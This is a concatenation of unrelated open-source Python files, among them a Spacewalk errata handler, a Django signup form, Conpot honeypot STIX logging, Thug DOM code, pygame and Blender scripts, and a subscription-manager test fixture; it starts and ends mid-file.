                        pcj_jdata_to_data += ' foo[i] = ' + jtype + '_to_' + type + '(Jdata.' + varstring + '[i]);\n'
                        pcj_jdata_to_data += ' data.set' + capvarstring + '(foo);\n'
                        pcj_jdata_to_data += ' }\n'

        # Close out the two converter methods and flush them.
        pcj_data_to_jdata += ' return(Jdata);\n'
        pcj_data_to_jdata += ' }\n\n'
        pcjfile.write(pcj_data_to_jdata)
        pcj_jdata_to_data += ' return(data);\n'
        pcj_jdata_to_data += ' }\n\n'
        pcjfile.write(pcj_jdata_to_data)

        # Close out the J<struct> class.
        jclass_constructor += ' }\n'
        jfile.write(jclass_constructor)
        jfile.write('}\n')
        jfile.close()

    # Close the SWIG %inline block and the player class, then the files.
    outfile.write('\n%}\n')
    outfile.close()
    pcjfile.write('\n}\n')
    pcjfile.close()
    aofcfile.close()
colloquium/spacewalk
backend/server/handlers/xmlrpc/errata.py
# # Copyright (c) 2008--2010 Red Hat, Inc. # # This software is licensed to you under the GNU General Public License, # version 2 (GPLv2). There is NO WARRANTY for this software, express or # implied, including the implied warranties of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2 # along with this software; if not, see # http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt. # # Red Hat trademarks are not licensed under GPLv2. No permission is # granted to use or replicate Red Hat trademarks that are incorporated # in this software or its documentation. # # Implements the errata.* functions for XMLRPC # # common modules imports from spacewalk.common.rhnTranslate import _ from spacewalk.common import rhnFault, rhnFlags, log_debug, log_error # server modules imports from spacewalk.server.rhnLib import parseRPMName from spacewalk.server.rhnHandler import rhnHandler from spacewalk.server import rhnSQL, rhnCapability class Errata(rhnHandler): """ Errata class --- retrieve (via xmlrpc) package errata. """ def __init__(self): rhnHandler.__init__(self) # Exposed Errata functions: self.functions = [] self.functions.append('GetByPackage') # Clients v1- self.functions.append('getPackageErratum') # Clients v2+ self.functions.append('getErrataInfo') # clients v2+ def GetByPackage(self, pkg, osRel): """ Clients v1- Get errata for a package given "n-v-r" format IN: pkg: "n-v-r" (old client call) or [n,v,r] osRel: OS release RET: a hash by errata that applies to this package (ie, newer packages are available). We also limit the scope for a particular osRel. """ if type(pkg) == type(''): # Old client support. 
pkg = parseRPMName(pkg) log_debug(1, pkg, osRel) # Stuff the action in the headers: transport = rhnFlags.get('outputTransportOptions') transport['X-RHN-Action'] = 'GetByPackage' # now look up the errata if type(pkg[0]) != type(''): log_error("Invalid package name: %s %s" % (type(pkg[0]), pkg[0])) raise rhnFault(30, _("Expected a package name, not: %s") % pkg[0]) #bug#186996:adding synopsis field to advisory info #client side changes are needed to access this data. h = rhnSQL.prepare(""" select distinct e.id errata_id, e.advisory_type errata_type, e.advisory advisory, e.topic topic, e.description description, e.synopsis synopsis from rhnErrata e, rhnPublicChannelFamily pcf, rhnChannelFamilyMembers cfm, rhnErrataPackage ep, rhnChannelPackage cp, rhnChannelErrata ce, rhnDistChannelMap dcm, rhnPackage p where 1=1 and p.name_id = LOOKUP_PACKAGE_NAME(:name) -- map to a channel and p.id = cp.package_id and cp.channel_id = dcm.channel_id and dcm.release = :dist -- map to an errata as well and p.id = ep.package_id and ep.errata_id = e.id -- the errata and the channel have to be linked and ce.channel_id = cp.channel_id -- and the channel has to be public and cp.channel_id = cfm.channel_id and cfm.channel_family_id = pcf.channel_family_id -- and get the erratum and e.id = ce.errata_id """) h.execute(name = pkg[0], dist = str(osRel)) ret = [] # sanitize the results for display in the clients while 1: row = h.fetchone_dict() if row is None: break for k in row.keys(): if row[k] is None: row[k] = "N/A" ret.append(row) return ret def getPackageErratum(self, system_id, pkg): """ Clients v2+ - Get errata for a package given [n,v,r,e,a,...] format Sing-along: You say erratum(sing), I say errata(pl)! :) IN: pkg: [n,v,r,e,s,a,ch,...] 
RET: a hash by errata that applies to this package """ log_debug(5, system_id, pkg) if type(pkg) != type([]) or len(pkg) < 7: log_error("Got invalid package specification: %s" % str(pkg)) raise rhnFault(30, _("Expected a package, not: %s") % pkg) # Authenticate and decode server id. self.auth_system(system_id) # log the entry log_debug(1, self.server_id, pkg) # Stuff the action in the headers: transport = rhnFlags.get('outputTransportOptions') transport['X-RHN-Action'] = 'getPackageErratum' name, ver, rel, epoch, arch, size, channel = pkg[:7] if epoch in ['', 'none', 'None']: epoch = None # XXX: also, should arch/size/channel ever be used? #bug#186996:adding synopsis field to errata info #client side changes are needed to access this data. h = rhnSQL.prepare(""" select distinct e.id errata_id, e.advisory_type errata_type, e.advisory advisory, e.topic topic, e.description description, e.synopsis synopsis from rhnServerChannel sc, rhnChannelPackage cp, rhnChannelErrata ce, rhnErrata e, rhnErrataPackage ep, rhnPackage p where p.name_id = LOOKUP_PACKAGE_NAME(:name) and p.evr_id = LOOKUP_EVR(:epoch, :ver, :rel) -- map to a channel and p.id = cp.package_id -- map to an errata as well and p.id = ep.package_id and ep.errata_id = e.id -- the errata and the channel have to be linked and e.id = ce.errata_id and ce.channel_id = cp.channel_id -- and the server has to be subscribed to the channel and cp.channel_id = sc.channel_id and sc.server_id = :server_id """) # " emacs sucks h.execute(name = name, ver = ver, rel = rel, epoch = epoch, server_id = str(self.server_id)) ret = [] # sanitize the results for display in the clients while 1: row = h.fetchone_dict() if row is None: break for k in row.keys(): if row[k] is None: row[k] = "N/A" ret.append(row) return ret # I don't trust this errata_id business, but chip says "trust me" def getErrataInfo(self, system_id, errata_id): log_debug(5, system_id, errata_id) # Authenticate the server certificate self.auth_system(system_id) # log 
this thing log_debug(1, self.server_id, errata_id) client_caps = rhnCapability.get_client_capabilities() log_debug(3,"Client Capabilities", client_caps) multiarch = 0 cap_info = None if client_caps and client_caps.has_key('packages.update'): cap_info = client_caps['packages.update'] if cap_info and cap_info['version'] > 1: multiarch = 1 statement = """ select distinct pn.name, pe.epoch, pe.version, pe.release, pa.label arch from rhnPackageName pn, rhnPackageEVR pe, rhnPackage p, rhnPackageArch pa, rhnChannelPackage cp, rhnServerChannel sc, rhnErrataPackage ep where ep.errata_id = :errata_id and ep.package_id = p.id and p.name_id = pn.id and p.evr_id = pe.id and p.package_arch_id = pa.id and sc.server_id = :server_id and sc.channel_id = cp.channel_id and cp.package_id = p.id """ h = rhnSQL.prepare(statement) h.execute(errata_id = errata_id, server_id = self.server_id) packages = h.fetchall_dict() ret = [] if not packages: return [] for package in packages: if package['name'] is not None: if package['epoch'] is None: package['epoch'] = "" pkg_arch = '' if multiarch: pkg_arch = package['arch'] or '' ret.append([package['name'], package['version'], package['release'], package['epoch'], pkg_arch]) return ret #----------------------------------------------------------------------------- if __name__ == "__main__": print "You can not run this module by itself" import sys; sys.exit(-1) #-----------------------------------------------------------------------------
Titulacion-Sistemas/PracticasDjango
usuarios_logueados/usuarios/models.py
from django import forms from django.contrib.auth.models import User from django.forms import ModelForm from django.db import models # Create your models here. #EDICION DE MODELO USER User.add_to_class('usuario_sico', models.CharField(max_length=10, null=False, blank=False)) User.add_to_class('contrasenia_sico', models.CharField(max_length=10, null=False, blank=False)) #User.add_to_class('amigos', models.ManyToManyField('self', symmetrical=True, blank=True)) #FORMULARIOS class SignUpForm(ModelForm): class Meta: model = User fields = ['username', 'password', 'email', 'first_name', 'last_name', 'usuario_sico', 'contrasenia_sico'] widgets = { 'password': forms.PasswordInput(), 'contrasenia_sico': forms.PasswordInput(), }
ioanaantoche/muhaha
ioana/RecordAudio.py
import sys import time from naoqi import ALProxy IP = "nao.local" PORT = 9559 if (len(sys.argv) < 2): print "Usage: 'python RecordAudio.py nume'" sys.exit(1) fileName = "/home/nao/" + sys.argv[1] + ".wav" aur = ALProxy("ALAudioRecorder", IP, PORT) channels = [0,0,1,0] aur.startMicrophonesRecording(fileName, "wav", 160000, channels) c=raw_input("Sfarsit?") aur.stopMicrophonesRecording() c=raw_input("play?") aup = ALProxy("ALAudioPlayer", IP, PORT) #Launchs the playing of a file aup.playFile(fileName,0.5,-1.0) c=raw_input("gata?") #Launchs the playing of a file #aup.playFile("/usr/share/naoqi/wav/random.wav") #Launchs the playing of a file on the left speaker to a volume of 50% #aup.playFile("/usr/share/naoqi/wav/random.wav",0.5,-1.0)
paradiseOffice/Bash_and_Cplus-plus
CPP/full_examples/pyqt/chap07/findandreplacedlg.py
#!/usr/bin/env python3 # Copyright (c) 2008-9 Qtrac Ltd. All rights reserved. # This program or module is free software: you can redistribute it and/or # modify it under the terms of the GNU General Public License as published # by the Free Software Foundation, either version 2 of the License, or # version 3 of the License, or (at your option) any later version. It is # provided for educational purposes and is distributed in the hope that # it will be useful, but WITHOUT ANY WARRANTY; without even the implied # warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See # the GNU General Public License for more details. import re from PyQt4.QtCore import (Qt, SIGNAL, pyqtSignature) from PyQt4.QtGui import (QApplication, QDialog) import ui_findandreplacedlg MAC = True try: from PyQt4.QtGui import qt_mac_set_native_menubar except ImportError: MAC = False class FindAndReplaceDlg(QDialog, ui_findandreplacedlg.Ui_FindAndReplaceDlg): def __init__(self, text, parent=None): super(FindAndReplaceDlg, self).__init__(parent) self.__text = str(text) self.__index = 0 self.setupUi(self) if not MAC: self.findButton.setFocusPolicy(Qt.NoFocus) self.replaceButton.setFocusPolicy(Qt.NoFocus) self.replaceAllButton.setFocusPolicy(Qt.NoFocus) self.closeButton.setFocusPolicy(Qt.NoFocus) self.updateUi() @pyqtSignature("QString") def on_findLineEdit_textEdited(self, text): self.__index = 0 self.updateUi() def makeRegex(self): findText = str(self.findLineEdit.text()) if str(self.syntaxComboBox.currentText()) == "Literal": findText = re.escape(findText) flags = re.MULTILINE|re.DOTALL|re.UNICODE if not self.caseCheckBox.isChecked(): flags |= re.IGNORECASE if self.wholeCheckBox.isChecked(): findText = r"\b{0}\b".format(findText) return re.compile(findText, flags) @pyqtSignature("") def on_findButton_clicked(self): regex = self.makeRegex() match = regex.search(self.__text, self.__index) if match is not None: self.__index = match.end() self.emit(SIGNAL("found"), match.start()) else: 
self.emit(SIGNAL("notfound")) @pyqtSignature("") def on_replaceButton_clicked(self): regex = self.makeRegex() self.__text = regex.sub(str(self.replaceLineEdit.text()), self.__text, 1) @pyqtSignature("") def on_replaceAllButton_clicked(self): regex = self.makeRegex() self.__text = regex.sub(str(self.replaceLineEdit.text()), self.__text) def updateUi(self): enable = not self.findLineEdit.text().isEmpty() self.findButton.setEnabled(enable) self.replaceButton.setEnabled(enable) self.replaceAllButton.setEnabled(enable) def text(self): return self.__text if __name__ == "__main__": import sys text = """US experience shows that, unlike traditional patents, software patents do not encourage innovation and R&D, quite the contrary. In particular they hurt small and medium-sized enterprises and generally newcomers in the market. They will just weaken the market and increase spending on patents and litigation, at the expense of technological innovation and research. Especially dangerous are attempts to abuse the patent system by preventing interoperability as a means of avoiding competition with technological ability. --- Extract quoted from Linus Torvalds and Alan Cox's letter to the President of the European Parliament http://www.effi.org/patentit/patents_torvalds_cox.html""" def found(where): print("Found at {0}".format(where)) def nomore(): print("No more found") app = QApplication(sys.argv) form = FindAndReplaceDlg(text) form.connect(form, SIGNAL("found"), found) form.connect(form, SIGNAL("notfound"), nomore) form.show() app.exec_() print(form.text())
markes1977/conpot-master
conpot/core/loggers/stix_transform.py
# Copyright (C) 2013 Johnny Vestergaard <jkv@unixcluster.dk> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. import json import ast import textwrap from mixbox import idgen from mixbox.namespaces import Namespace from stix.core import STIXHeader, STIXPackage from stix.common import InformationSource from stix.common.vocabs import VocabString from stix.incident import Incident from stix.incident.time import Time as StixTime from stix.indicator import Indicator from stix.ttp import TTP, VictimTargeting from stix.extensions.identity.ciq_identity_3_0 import CIQIdentity3_0Instance, STIXCIQIdentity3_0, OrganisationInfo from cybox.core import Observable from cybox.objects.socket_address_object import SocketAddress from cybox.objects.address_object import Address from cybox.objects.port_object import Port from cybox.objects.network_connection_object import NetworkConnection from cybox.objects.artifact_object import Artifact, ZlibCompression, Base64Encoding from cybox.common import ToolInformationList, ToolInformation from cybox.common import Time as CyboxTime from datetime import datetime import conpot CONPOT_NAMESPACE = 'mushmush-conpot' CONPOT_NAMESPACE_URL = 'http://mushmush.org/conpot' class StixTransformer(object): def __init__(self, config, dom): self.protocol_to_port_mapping = dict( modbus=502, snmp=161, http=80, 
s7comm=102, ) port_path_list = map(lambda x: '//conpot_template/protocols/'+x+'/@port', self.protocol_to_port_mapping.keys()) for port_path in port_path_list: try: protocol_port = ast.literal_eval(dom.xpath(port_path)[0]) protocol_name = port_path.rsplit("/", 2)[1] self.protocol_to_port_mapping[protocol_name] = protocol_port except IndexError: continue conpot_namespace = Namespace(CONPOT_NAMESPACE_URL, CONPOT_NAMESPACE, '') idgen.set_id_namespace(conpot_namespace) def _add_header(self, stix_package, title, desc): stix_header = STIXHeader() stix_header.title = title stix_header.description = desc stix_header.information_source = InformationSource() stix_header.information_source.time = CyboxTime() stix_header.information_source.time.produced_time = datetime.now() stix_package.stix_header = stix_header def transform(self, event): stix_package = STIXPackage() self._add_header(stix_package, "Unauthorized traffic to honeypot", "Describes one or more honeypot incidents") incident = Incident(id_="%s:%s-%s" % (CONPOT_NAMESPACE, 'incident', event['session_id'])) initial_time = StixTime() initial_time.initial_compromise = event['timestamp'].isoformat() incident.time = initial_time incident.title = "Conpot Event" incident.short_description = "Traffic to Conpot ICS honeypot" incident.add_category(VocabString(value='Scans/Probes/Attempted Access')) tool_list = ToolInformationList() tool_list.append(ToolInformation.from_dict({ 'name': "Conpot", 'vendor': "Conpot Team", 'version': conpot.__version__, 'description': textwrap.dedent('Conpot is a low interactive server side Industrial Control Systems ' 'honeypot designed to be easy to deploy, modify and extend.') })) incident.reporter = InformationSource(tools=tool_list) incident.add_discovery_method("Monitoring Service") incident.confidence = "High" # Victim Targeting by Sector ciq_identity = CIQIdentity3_0Instance() #identity_spec = STIXCIQIdentity3_0() #identity_spec.organisation_info = 
OrganisationInfo(industry_type="Electricity, Industrial Control Systems") #ciq_identity.specification = identity_spec ttp = TTP(title="Victim Targeting: Electricity Sector and Industrial Control System Sector") ttp.victim_targeting = VictimTargeting() ttp.victim_targeting.identity = ciq_identity incident.leveraged_ttps.append(ttp) indicator = Indicator(title="Conpot Event") indicator.description = "Conpot network event" indicator.confidence = "High" source_port = Port.from_dict({'port_value': event['remote'][1], 'layer4_protocol': 'tcp'}) dest_port = Port.from_dict({'port_value': self.protocol_to_port_mapping[event['data_type']], 'layer4_protocol': 'tcp'}) source_ip = Address.from_dict({'address_value': event['remote'][0], 'category': Address.CAT_IPV4}) dest_ip = Address.from_dict({'address_value': event['public_ip'], 'category': Address.CAT_IPV4}) source_address = SocketAddress.from_dict({'ip_address': source_ip.to_dict(), 'port': source_port.to_dict()}) dest_address = SocketAddress.from_dict({'ip_address': dest_ip.to_dict(), 'port': dest_port.to_dict()}) network_connection = NetworkConnection.from_dict( {'source_socket_address': source_address.to_dict(), 'destination_socket_address': dest_address.to_dict(), 'layer3_protocol': u"IPv4", 'layer4_protocol': u"TCP", 'layer7_protocol': event['data_type'], 'source_tcp_state': u"ESTABLISHED", 'destination_tcp_state': u"ESTABLISHED", } ) indicator.add_observable(Observable(network_connection)) artifact = Artifact() artifact.data = json.dumps(event['data']) artifact.packaging.append(ZlibCompression()) artifact.packaging.append(Base64Encoding()) indicator.add_observable(Observable(artifact)) incident.related_indicators.append(indicator) stix_package.add_incident(incident) stix_package_xml = stix_package.to_xml() return stix_package_xml
wukong-m2m/NanoKong
tools/python/scripts/installer.py
#!/usr/bin/env python import sys, os sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../../master')) sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../../master/wkpf')) print os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../../master/wkpf') from wkpf.pynvc import * from wkpf.wkpfcomm import * comm = getComm() print "node ids", comm.getNodeIds() comm.setFeature(2, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(2, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(2, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(2, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(2, "WuKong") comm.setFeature(7, WKPF_FEATURE_LIGHT_SENSOR, 1) comm.setFeature(7, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(7, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(7, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(7, "WuKong") comm.setFeature(4, WKPF_FEATURE_LIGHT_SENSOR, 1) comm.setFeature(4, WKPF_FEATURE_LIGHT_ACTUATOR, 0) comm.setFeature(4, WKPF_FEATURE_NUMERIC_CONTROLLER, 1) comm.setFeature(4, WKPF_FEATURE_NATIVE_THRESHOLD, 1) comm.setLocation(4, "WuKong") comm.setFeature(5, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(5, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(5, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(5, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(5, "WuKong") comm.setFeature(6, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(6, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(6, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(6, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(6, "WuKong") comm.setFeature(13, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(13, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(13, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(13, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(13, "WuKong") comm.setFeature(14, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(14, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(14, 
WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(14, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(14, "WuKong") comm.setFeature(15, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(15, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(15, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(15, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(15, "WuKong") comm.setFeature(10, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(10, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(10, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(10, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(10, "WuKong") comm.setFeature(12, WKPF_FEATURE_LIGHT_SENSOR, 0) comm.setFeature(12, WKPF_FEATURE_LIGHT_ACTUATOR, 1) comm.setFeature(12, WKPF_FEATURE_NUMERIC_CONTROLLER, 0) comm.setFeature(12, WKPF_FEATURE_NATIVE_THRESHOLD, 0) comm.setLocation(12, "WuKong")
tweemeterjop/thug
thug/DOM/W3C/HTML/HTMLElement.py
#!/usr/bin/env python try: from io import StringIO except ImportError: try: from cStringIO import StringIO except ImportError: from StringIO import StringIO import bs4 as BeautifulSoup import logging from thug.DOM.W3C.Element import Element from thug.DOM.W3C.Style.CSS.ElementCSSInlineStyle import ElementCSSInlineStyle from .attr_property import attr_property log = logging.getLogger("Thug") class HTMLElement(Element, ElementCSSInlineStyle): id = attr_property("id") title = attr_property("title") lang = attr_property("lang") dir = attr_property("dir") className = attr_property("class", default = "") def __init__(self, doc, tag): Element.__init__(self, doc, tag) ElementCSSInlineStyle.__init__(self, doc, tag) def getInnerHTML(self): if not self.hasChildNodes(): return "" html = StringIO() for tag in self.tag.contents: html.write(unicode(tag)) return html.getvalue() def setInnerHTML(self, html): self.tag.clear() soup = BeautifulSoup.BeautifulSoup(html, "html5lib") for node in list(soup.head.descendants): self.tag.append(node) name = getattr(node, 'name', None) if name is None: continue handler = getattr(log.DFT, 'handle_%s' % (name, ), None) if handler: handler(node) for node in list(soup.body.children): self.tag.append(node) name = getattr(node, 'name', None) if name is None: continue handler = getattr(log.DFT, 'handle_%s' % (name, ), None) if handler: handler(node) # soup.head.unwrap() # soup.body.unwrap() # soup.html.wrap(self.tag) # self.tag.html.unwrap() for node in self.tag.descendants: name = getattr(node, 'name', None) if not name: continue p = getattr(self.doc.window.doc.DFT, 'handle_%s' % (name, ), None) if p is None: p = getattr(log.DFT, 'handle_%s' % (name, ), None) if p: p(node) innerHTML = property(getInnerHTML, setInnerHTML) # WARNING: NOT DEFINED IN W3C SPECS! def focus(self): pass @property def sourceIndex(self): return None
PoisonBOx/PyGames
2.Pie/drawLine.py
import sys import pygame from pygame.locals import * pygame.init() screen = pygame.display.set_mode((600, 500)) pygame.display.set_caption("Drawing Lines") screen.fill((0, 80, 0)) # draw the line color = 100, 255, 200 width = 8 pygame.draw.line(screen, color, (100, 100), (500, 400), width) pygame.display.update() while True: for event in pygame.event.get(): if event.type in (QUIT, KEYDOWN): sys.exit()
JConwayAWT/PGSS14CC
lib/python/multimetallics/ase/cluster/cubic.py
""" Function-like objects that creates cubic clusters. """ import numpy as np from ase.data import reference_states as _refstate from ase.cluster.factory import ClusterFactory class SimpleCubicFactory(ClusterFactory): spacegroup = 221 xtal_name = 'sc' def get_lattice_constant(self): "Get the lattice constant of an element with cubic crystal structure." symmetry = _refstate[self.atomic_numbers[0]]['symmetry'] if symmetry != self.xtal_name: raise ValueError, ("Cannot guess the %s " % (self.xtal_name,) + "lattice constant of an element with crystal " + "structure %s." % (symmetry,)) return _refstate[self.atomic_numbers[0]]['a'] def set_basis(self): a = self.lattice_constant if not isinstance(a, (int, float)): raise ValueError("Improper lattice constant for %s crystal." % (self.xtal_name,)) self.lattice_basis = np.array([[a, 0., 0.], [0., a, 0.], [0., 0., a]]) self.resiproc_basis = self.get_resiproc_basis(self.lattice_basis) SimpleCubic = SimpleCubicFactory() class BodyCenteredCubicFactory(SimpleCubicFactory): xtal_name = 'bcc' atomic_basis = np.array([[0., 0., 0.], [.5, .5, .5]]) BodyCenteredCubic = BodyCenteredCubicFactory() class FaceCenteredCubicFactory(SimpleCubicFactory): xtal_name = 'fcc' atomic_basis = np.array([[0., 0., 0.], [0., .5, .5], [.5, 0., .5], [.5, .5, 0.]]) FaceCenteredCubic = FaceCenteredCubicFactory()
Urinx/SomeCodes
Python/others/practice/finding_if_prime.py
#!/usr/bin/python3 import math import random def finding_prime(number): num=abs(number) if num<4: return True for x in range(2,num): if num%x == 0: return False return True def finding_prime_sqrt(number): num=abs(number) if num<4: return True for x in range(2,int(math.sqrt(num))+1): if number%x == 0: return False return True def finding_prime_fermat(number): if number<=102: for a in range(2,number): if pow(a,number-1,number)!=1: return False return True else: for i in range(100): a=random.randint(2,number-1) if pow(a,number-1,number)!=1: return False return True def test_finding_prime(): number1=17 number2=20 assert(finding_prime(number1)==True) assert(finding_prime(number2)==False) assert(finding_prime_sqrt(number1)==True) assert(finding_prime_sqrt(number2)==False) assert(finding_prime_fermat(number1)==True) assert(finding_prime_fermat(number2)==False) print('Tests passed!') if __name__=='__main__': test_finding_prime()
ProfessorX/Config
.PyCharm30/system/python_stubs/-1247972723/_dbus_bindings/UInt64.py
# encoding: utf-8 # module _dbus_bindings # from /usr/lib/python2.7/dist-packages/_dbus_bindings.so # by generator 1.135 """ Low-level Python bindings for libdbus. Don't use this module directly - the public API is provided by the `dbus`, `dbus.service`, `dbus.mainloop` and `dbus.mainloop.glib` modules, with a lower-level API provided by the `dbus.lowlevel` module. """ # imports import dbus.lowlevel as __dbus_lowlevel from _LongBase import _LongBase class UInt64(_LongBase): """ An unsigned 64-bit integer between 0 and 0xFFFF FFFF FFFF FFFF, represented as a subtype of `long`. This type only exists on platforms where the C compiler has suitable 64-bit types, such as C99 ``unsigned long long``. Constructor:: dbus.UInt64(value: long[, variant_level: int]) -> UInt64 ``value`` must be within the allowed range, or `OverflowError` will be raised. ``variant_level`` must be non-negative; the default is 0. :IVariables: `variant_level` : int Indicates how many nested Variant containers this object is contained in: if a message's wire format has a variant containing a variant containing a uint64, this is represented in Python by a UInt64 with variant_level==2. """ def __init__(self, value, variant_level=None): # real signature unknown; restored from __doc__ pass @staticmethod # known case of __new__ def __new__(S, *more): # real signature unknown; restored from __doc__ """ T.__new__(S, ...) -> a new object with type S, a subtype of T """ pass
chebhou/Text-from-to-.XML
text_io_xml.py
bl_info = { "name" : "text objects to-from xml", "author" : "chebhou", "version" : (1, 0), "blender" : (2, 7, 3), "location" : "file->export->text to-from xml", "discription" : "copys an text objectx from-to xml file", "wiki_url" : " https://github.com/chebhou", "tracker_url" : "https://github.com/chebhou", "category" : "Import-Export" } import bpy from bpy.types import Operator from bpy_extras.io_utils import ExportHelper from bpy.props import EnumProperty, BoolProperty from xml.dom import minidom from xml.dom.minidom import Document def txt_sync(filepath): dom = minidom.parse(filepath) scenes =dom.getElementsByTagName('scene') for scene in scenes: scene_name=scene.getAttribute('name') print("\n",scene_name) bl_scene = bpy.data.scenes[scene_name] txt_objs =scene.getElementsByTagName('object') for obj in txt_objs: obj_name = obj.getAttribute('name') obj_body = obj.childNodes[0].nodeValue bl_obj = bl_scene.objects[obj_name].data.body = obj_body print(obj_name," ",obj_body) def txt_export(filepath): doc = Document() root = doc.createElement('data') doc.appendChild(root) for sce in bpy.data.scenes : #create a scene scene = doc.createElement('scene') scene.setAttribute('name', sce.name) root.appendChild(scene) for obj in sce.objects : if obj.type == 'FONT': #add object element object = doc.createElement('object') object.setAttribute('name', obj.name) txt_node = doc.createTextNode(obj.data.body) object.appendChild(txt_node) scene.appendChild(object) #write to a file file_handle = open(filepath,"wb") file_handle.write(bytes(doc.toprettyxml(indent='\t'), 'UTF-8')) file_handle.close() class text_export(Operator, ExportHelper): """write and read text objects to a file""" bl_idname = "export_scene.text_xml" bl_label = "text from-to xml" bl_options = {'REGISTER', 'UNDO'} #should remove undo ? 
# ExportHelper mixin class uses this filename_ext = ".xml" #parameters and variables convert = EnumProperty( name="Convert", description="Choose conversion", items=(('W', "write objects", "write text objects to xml"), ('R', "read objects", "read text objects from xml")), default='W', ) #main function def execute(self, context): bpy.ops.object.mode_set(mode = 'OBJECT') if self.convert == 'W': txt_export(self.filepath) else: txt_sync(self.filepath) bpy.context.scene.update() self.report({'INFO'},"Conversion is Done") return {'FINISHED'} def menu_func_export(self, context): self.layout.operator(text_export.bl_idname, text="Text to-from xml") def register(): bpy.utils.register_class(text_export) bpy.types.INFO_MT_file_export.append(menu_func_export) bpy.types.INFO_MT_file_import.append(menu_func_export) def unregister(): bpy.utils.unregister_class(text_export) bpy.types.INFO_MT_file_export.remove(menu_func_export) bpy.types.INFO_MT_file_import.append(menu_func_export) if __name__ == "__main__": register()
Lorquas/subscription-manager
test/fixture.py
from __future__ import print_function, division, absolute_import import difflib import locale import os import pprint import six import sys import tempfile try: import unittest2 as unittest except ImportError: import unittest # just log py.warnings (and pygtk warnings in particular) import logging try: # 2.7+ logging.captureWarnings(True) except AttributeError: pass from mock import Mock, MagicMock, NonCallableMock, patch, mock_open from contextlib import contextmanager from . import stubs import subscription_manager.injection as inj import subscription_manager.managercli from rhsmlib.services import config # use instead of the normal pid file based ActionLock from threading import RLock if six.PY2: OPEN_FUNCTION = '__builtin__.open' else: OPEN_FUNCTION = 'builtins.open' @contextmanager def open_mock(content=None, **kwargs): content_out = six.StringIO() m = mock_open(read_data=content) with patch(OPEN_FUNCTION, m, create=True, **kwargs) as mo: stream = six.StringIO(content) rv = mo.return_value rv.write = lambda x: content_out.write(x) rv.content_out = lambda: content_out.getvalue() rv.__iter__ = lambda x: iter(stream.readlines()) yield rv @contextmanager def open_mock_many(file_content_map=None, **kwargs): """ Mock out access to one or many files opened using the builtin "open". :param file_content_map: A dictionary of path : file_contents :type file_content_map: dict[str,str] :param kwargs: :return: """ file_content_map = file_content_map or {} for key, value in file_content_map.items(): file_content_map[key] = (mock_open(read_data=value), value, six.StringIO()) def get_file(path, *args, **kwargs): """ The side effect that will allow us to "open" the right "file". Not for use outside open_mock_many. 
:param path: The path which is passed in to the built :param args: :param kwargs: :return: """ try: rv, file_contents, content_out = file_content_map[path] except KeyError: if six.PY2: raise IOError(2, 'No such file or directory') else: raise OSError(2, 'No such file or directory') rv = rv.return_value rv.write = lambda x: content_out.write(x) rv.content_out = lambda: content_out.getvalue() return rv with patch(OPEN_FUNCTION, **kwargs) as mo: mo.side_effect = get_file yield mo @contextmanager def temp_file(content, *args, **kwargs): try: kwargs['delete'] = False kwargs.setdefault('prefix', 'sub-man-test') fh = tempfile.NamedTemporaryFile(mode='w+', *args, **kwargs) fh.write(content) fh.close() yield fh.name finally: os.unlink(fh.name) @contextmanager def locale_context(new_locale, category=None): old_category = category or locale.LC_CTYPE old_locale = locale.getlocale(old_category) category = category or locale.LC_ALL locale.setlocale(category, new_locale) try: yield finally: locale.setlocale(category, old_locale) class FakeLogger(object): def __init__(self): self.expected_msg = "" self.msg = None self.logged_exception = None def debug(self, buf, *args, **kwargs): self.msg = buf def error(self, buf, *args, **kwargs): self.msg = buf def exception(self, e, *args, **kwargs): 